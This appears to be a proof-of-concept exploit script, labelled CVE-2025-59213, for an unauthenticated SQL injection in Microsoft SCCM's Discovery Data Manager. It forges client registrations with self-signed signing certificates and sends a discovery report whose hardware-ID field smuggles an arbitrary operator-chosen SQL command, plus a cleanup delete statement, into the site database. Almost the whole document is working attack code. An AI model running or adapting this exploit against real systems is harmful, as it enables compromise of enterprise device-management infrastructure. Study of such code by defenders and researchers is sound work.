README.md
Rendering markdown...
#!/usr/bin/env python3
import argparse
import datetime
import random
import re
import uuid
import zlib
from time import sleep
from urllib.parse import urlparse
import requests
import urllib3
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15
from cryptography.x509 import ObjectIdentifier
from cryptography.x509.oid import NameOID
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def time1():
return datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
def time2():
return datetime.datetime.now(datetime.timezone.utc).strftime("%Y%m%d%H%M%S.%f") + "+000"
def time3():
return datetime.datetime.now(datetime.timezone.utc).strftime("%d/%m/%Y %H:%M:%S")
# from https://github.com/xpn/sccmwtf
class CryptoTools:
@staticmethod
def createCertificateForKey(key, cname):
subject = issuer = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, cname),
])
cert = x509.CertificateBuilder().subject_name(
subject
).issuer_name(
issuer
).public_key(
key.public_key()
).serial_number(
x509.random_serial_number()
).not_valid_before(
datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=2)
).not_valid_after(
datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=365)
).add_extension(
x509.KeyUsage(digital_signature=True, key_encipherment=False, key_cert_sign=False,
key_agreement=False, content_commitment=False, data_encipherment=True,
crl_sign=False, encipher_only=False, decipher_only=False),
critical=False,
).add_extension(
# SMS Signing Certificate (Self-Signed)
x509.ExtendedKeyUsage([ObjectIdentifier("1.3.6.1.4.1.311.101.2"), ObjectIdentifier("1.3.6.1.4.1.311.101")]),
critical=False,
).sign(key, hashes.SHA256())
return cert
@staticmethod
def generateRSAKey():
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
return key
@staticmethod
def buildMSPublicKeyBlob(key):
# Built from spec: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb
blobHeader = b"\x06\x02\x00\x00\x00\xA4\x00\x00\x52\x53\x41\x31\x00\x08\x00\x00\x01\x00\x01\x00"
blob = blobHeader + key.public_key().public_numbers().n.to_bytes(int(key.key_size / 8), byteorder="little")
return blob.hex().upper()
# Signs data using SHA256 and then reverses the byte order as per SCCM
@staticmethod
def sign(key, data):
# signature = key.sign(data, PSS(mgf=MGF1(hashes.SHA256()), salt_length=PSS.MAX_LENGTH ), hashes.SHA256())
signature = key.sign(data, PKCS1v15(), hashes.SHA256())
signature_rev = bytearray(signature)
signature_rev.reverse()
return bytes(signature_rev)
@staticmethod
def decrypt(key, data):
print(key.decrypt(data, PKCS1v15()))
@staticmethod
def load_privatekey_from_pem(pem):
return serialization.load_pem_private_key(pem, password=None)
@staticmethod
def dump_privatekey_to_pem(key):
pem = key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption()
)
return pem
@staticmethod
def dump_cert_to_pem(cert):
pem = cert.public_bytes(
encoding=serialization.Encoding.PEM
)
return pem
class SCCM:
tpl_multipart = b"--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: text/plain; charset=UTF-16\r\n\r\n%b\r\n--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: application/octet-stream\r\n\r\n%b\r\n--aAbBcCdDv1234567890VxXyYzZ--"
tpl_ccm_header = """<Msg SchemaVersion="1.1">
<ID>{ID}</ID>
<SourceID>{SMSID}</SourceID>
<SOURCE_HOST>{SOURCE_HOST}</SOURCE_HOST>
<ReplyTo>direct:dummy:dummy</ReplyTo>
<TargetHost>{TARGET_HOST}</TargetHost>
<TargetEndpoint>{TARGET_ENDPOINT}</TargetEndpoint>
<TargetAddress>mp:{TARGET_ENDPOINT}</TargetAddress>
<Priority>3</Priority>
<ReplyTo>direct:dummy:dummy</ReplyTo>
<Timeout>86400</Timeout>
<Protocol>http</Protocol>
<ReplyMode>{REPLY_MODE}</ReplyMode>
<SentTime>{TIME}</SentTime>
<Body Type="ByteRange" Offset="0" Length="{LENGTH}"/>{ATTACHMENT}
<Hooks><Hook3 Name="zlib-compress"/>{CLIENT_AUTH}</Hooks><Payload Type="inline"/>
<ReplyCapabilities><AllowRegistrationReset>direct:{SOURCE_HOST}:ClientRegistration</AllowRegistrationReset></ReplyCapabilities></Msg>"""
tpl_hook2_clientauth = """<Hook2 Name="clientauth"><Property Name="AuthSenderMachine">{SOURCE_HOST}</Property><Property Name="HashAlgorithm">1.2.840.113549.1.1.11</Property><Property Name="ClientCapability">NonSSL</Property><Property Name="PayloadSignature">{PayloadSignature}</Property></Hook2>"""
tpl_attachment_header = """<Attachment Type="ByteRange" Length="{LENGTH}" Name="{NAME}" Offset="{OFFSET}"></Attachment>"""
# MP_ClientRegistration
tpl_client_registration_request = """<ClientRegistrationRequest>{DATA}<Signature><SignatureValue>{PAYLOAD_SIGNATURE}</SignatureValue></Signature></ClientRegistrationRequest>"""
# <Property Name="FQ Name" Value="{CLIENT_NAME}" />
tpl_client_registration_data = """<Data HashAlgorithm="1.2.840.113549.1.1.11" SMSID="{SMSID}" RequestType="Registration" TimeStamp="{TIME}" ><AgentInformation AgentIdentity="CCMSetup.exe" AgentVersion="{CLIENT_VERSION}" AgentType="0"/><Certificates><Encryption Encoding="HexBinary" KeyType="1">{encryption}</Encryption><Signing Encoding="HexBinary" KeyType="1">{signature}</Signing></Certificates><DiscoveryProperties><Property Name="Netbios Name" Value="{CLIENT_NAME}" /><Property Name="SMBIOSID" Value="GUID:{SMBIOSID}" /><Property Name="FQ Name" Value="{CLIENT_NAME}" /><Property Name="AgentEdition" Value="0" /><Property Name="Locale ID" Value="2057" /><Property Name="InternetFlag" Value="0" /></DiscoveryProperties></Data>"""
# MP_DdrEndpoint
tpl_ddr_report = """<?xml version='1.0' encoding='UTF-16'?>
<Report>
<ReportHeader>
<Identification>
<Machine>
<ClientInstalled>1</ClientInstalled>
<ClientType>1</ClientType>
<ClientID>{SMSID}</ClientID>
<ClientVersion>{CLIENT_VERSION}</ClientVersion>
<NetBIOSName>{SOURCE_HOST}</NetBIOSName>
<CodePage>437</CodePage>
<SystemDefaultLCID>1033</SystemDefaultLCID>
</Machine>
</Identification>
<ReportDetails>
<ReportContent>Inventory Data</ReportContent>
<ReportType>Full</ReportType>
<Date>{TIME2}</Date>
<Version>9.0</Version>
<Format>1.1</Format>
</ReportDetails>
<InventoryAction ActionType="Predefined">
<InventoryActionID>{{00000000-0000-0000-0000-000000000003}}</InventoryActionID>
<Description>Discovery</Description>
<InventoryActionLastUpdateTime>{TIME2}</InventoryActionLastUpdateTime>
</InventoryAction>
</ReportHeader>
<ReportBody>
<Instance ParentClass="CCM_Client" Class="CCM_Client" Namespace="\\\\{SOURCE_HOST}\\ROOT\\ccm" Content="New">
<CCM_Client>
<ClientIdChangeDate>{TIME3}</ClientIdChangeDate>
<PreviousClientId>{OLDSMSID}</PreviousClientId>
</CCM_Client>
</Instance>
<Instance ParentClass="CCM_ClientIdentificationInformation" Class="CCM_ClientIdentificationInformation" Namespace="\\\\{SOURCE_HOST}\\ROOT\\ccm" Content="New">
<CCM_ClientIdentificationInformation>
<HardwareID1>{HID}</HardwareID1>
</CCM_ClientIdentificationInformation>
</Instance>
</ReportBody>
</Report>"""
def __init__(self, target, key, cert, client_sign_key, sqlcmd, altAuth=False, autoClean=True, verbose=False):
self._target = target
self._target_url = f"{target}/ccm_system_altauth/request" if altAuth else f"{target}/ccm_system/request"
self._pkey = key
self._cert = cert
# gen and persist cert if one isn't provided via cmdline
if client_sign_key is None:
self.signkey = CryptoTools.generateRSAKey()
keyfname = f'/tmp/sccm_poc.key'
print(f"[+] Generated new signing key, saved to {keyfname}")
with open(keyfname, 'wb') as f:
f.write(CryptoTools.dump_privatekey_to_pem(self.signkey))
else:
self.signkey = CryptoTools.load_privatekey_from_pem(open(client_sign_key,'rb').read())
self.signcert = CryptoTools.createCertificateForKey(self.signkey, u"ConfigMgr Client")
self.signcert_hex = self.signcert.public_bytes(serialization.Encoding.DER).hex().upper()
self.SMSID = ""
self.OLDSMSID = ""
self.CLIENT_VERSION = random.randint(1, 999) # marker for cleaning
# clean registered client
self.auto_clean_cmd = f"delete from System_DISC where Client_Version0='{self.CLIENT_VERSION}';" if autoClean else ''
# injection vector
self.HID = f"{self.CLIENT_VERSION}';{self.auto_clean_cmd}{sqlcmd}-- "
self.TARGET_HOST = urlparse(self._target_url).hostname
self.SMBIOS_GUID0 = uuid.uuid4().__str__().upper()
self.verbose = verbose
def _debug(self, m):
if self.verbose:
print(m)
def __ccm_post(self, data):
headers = {"User-Agent": "ConfigMgr Messaging HTTP Sender", "Content-Type": 'multipart/mixed; boundary="aAbBcCdDv1234567890VxXyYzZ"'}
# self._debug(f">>>> HTTP Request <<<<<\n{data.decode('utf-16-le')}\n")
r = requests.request("CCM_POST", self._target_url, headers=headers, data=data, verify=False, cert=(self._cert, self._pkey))
self._debug(f">>>> HTTP Response : {r.status_code} <<<<<\n{r.text}\n")
return r.content
def __ccm_messaging_request(self, endpoint, body, attachment=b"", clientSMSID="", clientname="", clientauth=False, isAsync=False):
MSGID = f'{{{uuid.uuid4().__str__().upper()}}}'
print(f"[+] CcmMessage : ID={MSGID}")
final_body = body + attachment + b"\x00\x00"
compressedbody = zlib.compress(final_body)
clientsig = ""
if clientauth:
print("[+] CcmMessage : adding clientauth")
clientsig = self.tpl_hook2_clientauth.format(SOURCE_HOST=clientname, PayloadSignature=self.sign(compressedbody))
attachment_header = ""
if len(attachment):
print("[+] CcmMessage : adding attachment")
attachment_header = self.tpl_attachment_header.format(LENGTH=len(attachment), OFFSET=len(body), NAME="Attachment1")
ccm_header = self.tpl_ccm_header.format(LENGTH=len(final_body), ID=MSGID, TARGET_HOST=self.TARGET_HOST, TARGET_ENDPOINT=endpoint, REPLY_MODE="Sync" if not isAsync else "Async", TIME=time1(), SMSID=clientSMSID, SOURCE_HOST=clientname, ATTACHMENT=attachment_header, CLIENT_AUTH=clientsig)
multipart_body = self.tpl_multipart % (ccm_header.encode("utf-16"), compressedbody)
# self._debug(f">>>> CcmMessaging Header <<<<<\n{ccm_header}\n")
self._debug(f">>>> CcmMessaging Body <<<<<\n{final_body.decode()}\n")
return self.__ccm_post(multipart_body)
def sign(self, data):
return CryptoTools.sign(self.signkey, data).hex().upper()
def register_client(self, clientname):
self.SOURCE_HOST = clientname
b = self.signcert.public_bytes(serialization.Encoding.DER).hex().upper()
reg_data = self.tpl_client_registration_data.format(SMSID="", TIME=time1(), CLIENT_NAME=clientname, encryption=self.signcert_hex, signature=self.signcert_hex, SMBIOSID=self.SMBIOS_GUID0, CLIENT_VERSION=self.CLIENT_VERSION)
sig = self.sign(reg_data.encode('utf-16-le'))
client_registration_request = self.tpl_client_registration_request.format(DATA=reg_data, PAYLOAD_SIGNATURE=sig)
rsp = self.__ccm_messaging_request('MP_ClientRegistration', body=client_registration_request.encode('utf-16-le'), attachment=b"", clientSMSID=self.SMSID, clientname=self.SOURCE_HOST, clientauth=False)
deflatedData = zlib.decompress(rsp.split(b'--aAbBcCdDv1234567890VxXyYzZ')[2].split(b'\r\n')[3]).decode('utf-16-le')
# print(deflatedData)
r = re.findall("SMSID=\"([^\"]+)\"", deflatedData)
if r != None:
SMSID = r[0]
print(f"[+] Got SMSID = {SMSID} for new client {clientname}")
sleep(1)
return SMSID
else:
print("[!] Failed to register client")
return None
def send_ddr_report(self, clientname):
report_attachment = self.tpl_ddr_report.format(SMSID=self.SMSID, OLDSMSID=self.OLDSMSID, HID=self.HID, SOURCE_HOST=self.SOURCE_HOST, CLIENT_VERSION=self.CLIENT_VERSION, TIME2=time2(), TIME3=time3())
print(f'[+] Sending DDR report: SMSID={self.SMSID} OLDSMSID={self.OLDSMSID}')
rsp = self.__ccm_messaging_request('MP_DdrEndpoint', body=b"", attachment=report_attachment.encode('utf-16-le'), clientSMSID=self.SMSID, clientname=self.SOURCE_HOST, clientauth=True, isAsync=True)
if 'NoReply'.encode('utf-16-le') in rsp :
print('[+] DDR report sent successfully')
def exploit(self, clientname, delay=10):
assert delay >= 2
self.SMSID = self.register_client(clientname)
# create new cert to force a new SMSID (new versions)
self.signcert = CryptoTools.createCertificateForKey(self.signkey, u"ConfigMgr Client")
self.signcert_hex = self.signcert.public_bytes(serialization.Encoding.DER).hex().upper()
self.OLDSMSID = self.register_client(clientname)
assert self.SMSID != self.OLDSMSID
# mandatory
sleep(delay)
self.send_ddr_report(clientname)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="CVE-2025-59213 - Discovery Data Manager (DDM) Unauthenticated SQL Injection")
parser.add_argument("-t", "--target", action="store", required=True, default=None, help="Target (http://sccm-mp.local/)")
parser.add_argument("-sk", "--sigkey", action="store", required=False, default=None, help="SMS signature key (automatically generated if omitted)")
parser.add_argument("-k", "--key", action="store", required=False, default=None, help="Private key file for mTLS")
parser.add_argument("-c", "--cert", action="store", required=False, default=None, help="Certificate file for mTLS")
parser.add_argument("-v", "--verbose", action="store_true", required=False, default=False, help="Verbose output, print requests")
parser.add_argument("-cn", "--client-name", action="store", required=True, default=False, help="Name of the client that will be created in SCCM")
parser.add_argument("-rs", "--registration-sleep", action="store", required=False, default=10, help="The amount of time, in seconds, that should be waited after registrating a new device (2 seconds by default)")
parser.add_argument("-a", "--altauth", action="store_true", required=False, default=False, help="Use the MP's alternate authentication endpoint")
parser.add_argument("-sql", action="store", required=True, default=None, help="Query to execute through the SQL injection")
parser.add_argument("-nc", "--no-clean", action="store_true", required=False, default=None, help="Do not automatically clean the registred devices")
options = parser.parse_args()
SCCM(options.target, options.key, options.cert, options.sigkey, options.sql, altAuth=options.altauth, autoClean=(not options.no_clean), verbose=options.verbose).exploit(options.client_name, int(options.registration_sleep))